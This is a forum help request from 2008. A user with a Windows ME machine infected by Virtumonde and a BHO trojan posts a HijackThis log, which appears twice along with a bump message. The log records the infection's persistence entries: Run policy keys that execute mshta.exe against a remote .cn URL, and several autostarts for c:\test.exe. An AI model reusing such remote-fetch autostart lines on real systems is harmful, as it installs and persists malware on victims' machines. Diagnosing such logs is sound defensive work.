I have an old Windows ME system and recently contracted what appears to be a Trojan virus. I installed Spybot SD and it has detected up to 30 isssues including mostly registry changes, but also Virtumonde viruses. When I use the Fix Selected Items button, it usually clears everything the first time (occasionally will leave one unfixed but it fixes after the second scan). Whenever, I re-boot it comes back. When connnected to the interenet, the virus launches toward a random internet address and begins to download various spyware and virus infections and also streams nasty web-sites and pulls in pictures/videos, etc. The system will run ok when not connected - although because it still attempts to stream the internet, it will sometimes lock stating the system is low on resources. I also had PCS Security Shield installed as a virus scan and it picks up Trojan.Win32.BHO virus. Same issue though - it will delete, but then will always launch again upon re-boot. Please advise on what I may be able to do to clean up. FYI, my system restore was not working prior so I have potential restore points prior to the infection.
Sorry... here is the HJT file. This is after I ran Spybot SD and it found 37 entries and was able to delete (fix) all but 3 entries for Virtumondu.Crack. It will usually delete those too if I disconnect from internet and re-scan.
Thanks,
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:35:58 PM, on 11/8/2008
Platform: Windows ME (Win9x 4.90.3000)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\COMMON\BASE\VRSRV.EXE
C:\WINDOWS\SYSTEM\KB918547\KB918547.EXE
C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\DEVLDR16.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\RESTORE\STMGR.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\CREATIVE\SBLIVE\AUDIOHQ\AHQTB.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\AHQ\CTMIX32.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\BROTHER\BRMFCMON\BRMFCWND.EXE
C:\PROGRAM FILES\CYBERLINK\POWERDVD\PDVDSERV.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\COMMON\BASE\VRMON.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\PCFIREWALL\VRFWMON.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\ANTIVIRUS\HRRES.EXE
C:\PROGRAM FILES\BROTHER\CONTROLCENTER3\BRCCMCTL.EXE
C:\WINDOWS\SYSTEM\BRMFRSMG.EXE
C:\PROGRAM FILES\BROTHER\BRMFCMON\BRMFCMON.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\TEST.EXE
C:\PROGRAM FILES\TREND MICRO\HIJACKTHIS\HIJACKTHIS.EXE
C:\TEST.EXE
C:\WINDOWS\SYSTEM\WBEM\WINMGMT.EXE
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\READER\ACTIVEX\ACROIEHELPER.DLL
O2 - BHO: IEHelpObj Class - {EC45E3FE-C16D-4F24-9238-D1B49AD74815} - C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\SERVICE\HWEBMAN.DLL
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O2 - BHO: qs Class - {8A555E0E-6240-DD93-198D-45F571D4FD9B} - C:\PROGRAM FILES\ALTCMD\ALTCMD32.DLL
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Speed racer] C:\Program Files\Creative\PlayCenter\CTSRReg.exe
O4 - HKLM\..\Run: [AudioHQ] C:\Program Files\Creative\SBLive\AudioHQ\AHQTB.EXE
O4 - HKLM\..\Run: [CreativeMixer] C:\Program Files\Creative\Sharedll\AHQ\CTMIX32.EXE /t
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\Updreg.exe
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [IndexSearch] C:\Program Files\ScanSoft\PaperPort\IndexSearch.exe
O4 - HKLM\..\Run: [BrmfRmPA.exe] C:\WINDOWS\BrmfRmPA.exe -startup
O4 - HKLM\..\Run: [BrMfcWnd] C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN
O4 - HKLM\..\Run: [SetDefPrt] C:\Program Files\Brother\Brmfl06a\BrStDvPt.exe
O4 - HKLM\..\Run: [xBrotherMeCom] C:\BRME\BrMeCom.exe 5
O4 - HKLM\..\Run: [ControlCenter3] C:\Program Files\Brother\ControlCenter3\brctrcen.exe /autorun
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [VrMon] C:\Program Files\PCSecurityShield\Common\Base\vrmon.exe
O4 - HKLM\..\Run: [vrfwMon] C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\PCFIREWALL\VRFWMON.EXE
O4 - HKLM\..\Run: [VrSchedule] C:\Program Files\PCSecurityShield\ShieldPro\AntiVirus\HrRes.exe
O4 - HKLM\..\Run: [UnlockerAssistant] C:\WINDOWS\Desktop\Unlocker\UnlockerAssistant.exe
O4 - HKLM\..\Run: [devldr16.exe] C:\WINDOWS\SYSTEM\devldr16.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKLM\..\RunServices: [VrSrv] C:\Program Files\PCSecurityShield\Common\Base\vrsrv.exe
O4 - HKLM\..\RunServices: [KB918547] C:\WINDOWS\SYSTEM\KB918547\KB918547.EXE
O4 - HKLM\..\RunServices: [KB891711] C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
O4 - HKLM\..\RunOnce: [SpybotDeletingA2912] command /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKLM\..\RunOnce: [SpybotDeletingC4909] cmd /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\RunOnce: [SpybotDeletingB4125] command /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\RunOnce: [SpybotDeletingD2142] cmd /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\Policies\Explorer\Run: [test] mshta.exe http://cd9dxm1qn2yq5n5jnzuj.cn/s_t.php
O4 - HKCU\..\Policies\Explorer\Run: [Msn] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnHost] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe
O4 - HKUS\.DEFAULT\..\RunOnce: [SpybotDeletingB4125] command /c del "C:\Program Files\altcmd\altcmd32.dll" (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [SpybotDeletingD2142] cmd /c del "C:\Program Files\altcmd\altcmd32.dll" (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [test] mshta.exe http://cd9dxm1qn2yq5n5jnzuj.cn/s_t.php (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe (User 'Default user')
O4 - .DEFAULT Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE (User 'Default user')
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\PROGRA~1\MESSEN~1\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: MSN Messenger Service - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\PROGRA~1\MESSEN~1\MSMSGS.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab
--
End of file - 7152 bytes
I last posted my HJT file on 11-08. I haven't received a response. Did I fail to complete something per instructions?
Thanks,
AlexA
------------------
Post here if still waiting for help in the Malware Forum, (AFTER) FOUR days
Sorry... here is the HJT file. This is after I ran Spybot SD and it found 37 entries and was able to delete (fix) all but 3 entries for Virtumondu.Crack. It will usually delete those too if I disconnect from internet and re-scan.
Thanks,
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:35:58 PM, on 11/8/2008
Platform: Windows ME (Win9x 4.90.3000)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\COMMON\BASE\VRSRV.EXE
C:\WINDOWS\SYSTEM\KB918547\KB918547.EXE
C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\DEVLDR16.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\RESTORE\STMGR.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\CREATIVE\SBLIVE\AUDIOHQ\AHQTB.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\AHQ\CTMIX32.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\BROTHER\BRMFCMON\BRMFCWND.EXE
C:\PROGRAM FILES\CYBERLINK\POWERDVD\PDVDSERV.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\COMMON\BASE\VRMON.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\PCFIREWALL\VRFWMON.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\ANTIVIRUS\HRRES.EXE
C:\PROGRAM FILES\BROTHER\CONTROLCENTER3\BRCCMCTL.EXE
C:\WINDOWS\SYSTEM\BRMFRSMG.EXE
C:\PROGRAM FILES\BROTHER\BRMFCMON\BRMFCMON.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\TEST.EXE
C:\PROGRAM FILES\TREND MICRO\HIJACKTHIS\HIJACKTHIS.EXE
C:\TEST.EXE
C:\WINDOWS\SYSTEM\WBEM\WINMGMT.EXE
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\READER\ACTIVEX\ACROIEHELPER.DLL
O2 - BHO: IEHelpObj Class - {EC45E3FE-C16D-4F24-9238-D1B49AD74815} - C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\SERVICE\HWEBMAN.DLL
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O2 - BHO: qs Class - {8A555E0E-6240-DD93-198D-45F571D4FD9B} - C:\PROGRAM FILES\ALTCMD\ALTCMD32.DLL
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Speed racer] C:\Program Files\Creative\PlayCenter\CTSRReg.exe
O4 - HKLM\..\Run: [AudioHQ] C:\Program Files\Creative\SBLive\AudioHQ\AHQTB.EXE
O4 - HKLM\..\Run: [CreativeMixer] C:\Program Files\Creative\Sharedll\AHQ\CTMIX32.EXE /t
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\Updreg.exe
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [IndexSearch] C:\Program Files\ScanSoft\PaperPort\IndexSearch.exe
O4 - HKLM\..\Run: [BrmfRmPA.exe] C:\WINDOWS\BrmfRmPA.exe -startup
O4 - HKLM\..\Run: [BrMfcWnd] C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN
O4 - HKLM\..\Run: [SetDefPrt] C:\Program Files\Brother\Brmfl06a\BrStDvPt.exe
O4 - HKLM\..\Run: [xBrotherMeCom] C:\BRME\BrMeCom.exe 5
O4 - HKLM\..\Run: [ControlCenter3] C:\Program Files\Brother\ControlCenter3\brctrcen.exe /autorun
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [VrMon] C:\Program Files\PCSecurityShield\Common\Base\vrmon.exe
O4 - HKLM\..\Run: [vrfwMon] C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\PCFIREWALL\VRFWMON.EXE
O4 - HKLM\..\Run: [VrSchedule] C:\Program Files\PCSecurityShield\ShieldPro\AntiVirus\HrRes.exe
O4 - HKLM\..\Run: [UnlockerAssistant] C:\WINDOWS\Desktop\Unlocker\UnlockerAssistant.exe
O4 - HKLM\..\Run: [devldr16.exe] C:\WINDOWS\SYSTEM\devldr16.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKLM\..\RunServices: [VrSrv] C:\Program Files\PCSecurityShield\Common\Base\vrsrv.exe
O4 - HKLM\..\RunServices: [KB918547] C:\WINDOWS\SYSTEM\KB918547\KB918547.EXE
O4 - HKLM\..\RunServices: [KB891711] C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
O4 - HKLM\..\RunOnce: [SpybotDeletingA2912] command /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKLM\..\RunOnce: [SpybotDeletingC4909] cmd /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\RunOnce: [SpybotDeletingB4125] command /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\RunOnce: [SpybotDeletingD2142] cmd /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\Policies\Explorer\Run: [test] mshta.exe http://cd9dxm1qn2yq5n5jnzuj.cn/s_t.php
O4 - HKCU\..\Policies\Explorer\Run: [Msn] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnHost] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe
O4 - HKUS\.DEFAULT\..\RunOnce: [SpybotDeletingB4125] command /c del "C:\Program Files\altcmd\altcmd32.dll" (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [SpybotDeletingD2142] cmd /c del "C:\Program Files\altcmd\altcmd32.dll" (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [test] mshta.exe http://cd9dxm1qn2yq5n5jnzuj.cn/s_t.php (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe (User 'Default user')
O4 - .DEFAULT Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE (User 'Default user')
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\PROGRA~1\MESSEN~1\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: MSN Messenger Service - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\PROGRA~1\MESSEN~1\MSMSGS.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab
--
End of file - 7152 bytes
I last posted my HJT file on 11-08. I haven't received a response. Did I fail to complete something per instructions?
Thanks,
AlexA
------------------
Post here if still waiting for help in the Malware Forum, (AFTER) FOUR days
Last edited by a moderator: